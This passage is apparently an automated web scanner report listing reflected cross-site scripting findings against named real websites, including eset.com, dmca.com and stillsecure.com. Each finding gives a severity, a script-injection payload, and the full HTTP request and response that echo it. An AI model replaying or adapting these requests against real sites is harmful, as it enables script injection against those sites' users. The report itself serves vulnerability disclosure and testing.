Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=2efe4"><script>alert(1)</script>2a9cfb0f5d8&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:45 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="company" type="text" value="2efe4\"><script>alert(1)</script>2a9cfb0f5d8">
...[SNIP]...
6.64. http://www.stillsecure.com/m/ [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f5b7"><script>alert(1)</script>eaa16a5bb36 was submitted in the email parameter. This input was echoed as 1f5b7\"><script>alert(1)</script>eaa16a5bb36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=1f5b7"><script>alert(1)</script>eaa16a5bb36&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:48 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17196

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="email" type="text" value="1f5b7\"><script>alert(1)</script>eaa16a5bb36">
...[SNIP]...
6.65. http://www.stillsecure.com/m/ [firstName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The value of the firstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54249"><script>alert(1)</script>bb0ca4d9c50 was submitted in the firstName parameter. This input was echoed as 54249\"><script>alert(1)</script>bb0ca4d9c50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=54249"><script>alert(1)</script>bb0ca4d9c50&lastName=&company=&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:38 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17190

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="firstName" type="text" value="54249\"><script>alert(1)</script>bb0ca4d9c50">
...[SNIP]...
6.66. http://www.stillsecure.com/m/ [lastName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The value of the lastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb23d"><script>alert(1)</script>9630ad29cfd was submitted in the lastName parameter. This input was echoed as eb23d\"><script>alert(1)</script>9630ad29cfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=eb23d"><script>alert(1)</script>9630ad29cfd&company=&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:42 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17178

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="lastName" type="text" value="eb23d\"><script>alert(1)</script>9630ad29cfd">
...[SNIP]...
6.67. http://www.stillsecure.com/m/ [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffb4b"><script>alert(1)</script>380c8aa2910 was submitted in the phone parameter. This input was echoed as ffb4b\"><script>alert(1)</script>380c8aa2910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=&phone=ffb4b"><script>alert(1)</script>380c8aa2910&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:52 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17138

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="phone" type="text" value="ffb4b\"><script>alert(1)</script>380c8aa2910">
...[SNIP]...
6.68. http://www.trust-guard.com/Other/ImageResizer.php [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trust-guard.com
Path:   /Other/ImageResizer.php

Issue detail

The value of the src request parameter is copied into the HTML document as plain text between tags. The payload 1c068<script>alert(1)</script>20c7cb0df31 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Other/ImageResizer.php?src=http://www.trust-guard.com/Images/Testimonials/m5videoguide.gif1c068<script>alert(1)</script>20c7cb0df31&w=160&maxh=45 HTTP/1.1
Host: www.trust-guard.com
Proxy-Connection: keep-alive
Referer: http://www.trust-guard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=53j8cu4bh6ab8gf50molua90i4; __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; __utmc=147269874; __utmb=147269874.2.10.1303758698

Response

HTTP/1.1 400 Bad Request
Date: Mon, 25 Apr 2011 19:33:58 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93

file not found /Images/Testimonials/m5videoguide.gif1c068<script>alert(1)</script>20c7cb0df31
6.69. https://hourly.deploy.com/hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c6f43<script>alert(1)</script>9d16581bbf9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)c6f43<script>alert(1)</script>9d16581bbf9
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Mon, 25 Apr 2011 13:41:34 GMT
Server: Apache/2.0.46 (Red Hat)
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)c6f43<script>alert(1)</script>9d16581bbf9</td>
...[SNIP]...
6.70. http://www.dmca.com/Protection/Status.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dmca.com
Path:   /Protection/Status.aspx

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f5e30--><script>alert(1)</script>7527382c8aa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Protection/Status.aspx?id=6d6905a9-aeec-4426-921a-33dc8d0cdfb9&PAGE_ID=aHR0cDovL3d3dy5yZXB1dGF0aW9uY2hhbmdlci5jb20vc2NoZWR1bGVkLmh0bWw1 HTTP/1.1
Host: www.dmca.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f5e30--><script>alert(1)</script>7527382c8aa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wubflym5pb53bt45ku4n3oa4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: whoson=320680-61842.144793; expires=Thu, 23-Jun-2011 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 16:10:41 GMT
Content-Length: 14278


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head id="ctl00_mstrHead"><title>
   Reputation Changer | Protected by DMCA Protecti
...[SNIP]...
<br />Referer is: http://www.google.com/search?hl=en&q=f5e30--><script>alert(1)</script>7527382c8aa
           <br />
...[SNIP]...
6.71. http://www.eset.com/business/server-security/linux-file [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /business/server-security/linux-file

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 619e4"-alert(1)-"482a8458b9e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=619e4"-alert(1)-"482a8458b9e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17267
Date: Mon, 25 Apr 2011 12:59:24 GMT
X-Varnish: 1310979423
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=619e4"-alert(1)-"482a8458b9e";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
6.72. http://www.eset.com/us [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4087"-alert(1)-"8cebc1897b2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B
Referer: http://www.google.com/search?hl=en&q=f4087"-alert(1)-"8cebc1897b2

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:18:23 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Mon, 25 Apr 2011 15:18:23 GMT
X-Varnish: 555657802
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=f4087"-alert(1)-"8cebc1897b2";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
6.73. http://www.eset.com/us/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 631c6"-alert(1)-"5990df6aee9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B
Referer: http://www.google.com/search?hl=en&q=631c6"-alert(1)-"5990df6aee9

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Fri, 24-Jun-2011 15:20:14 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26742
Date: Mon, 25 Apr 2011 15:20:14 GMT
X-Varnish: 555663552
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=631c6"-alert(1)-"5990df6aee9";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
6.74. http://www.eset.com/us/business/products [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/products

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c73f"-alert(1)-"f9f42456929 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
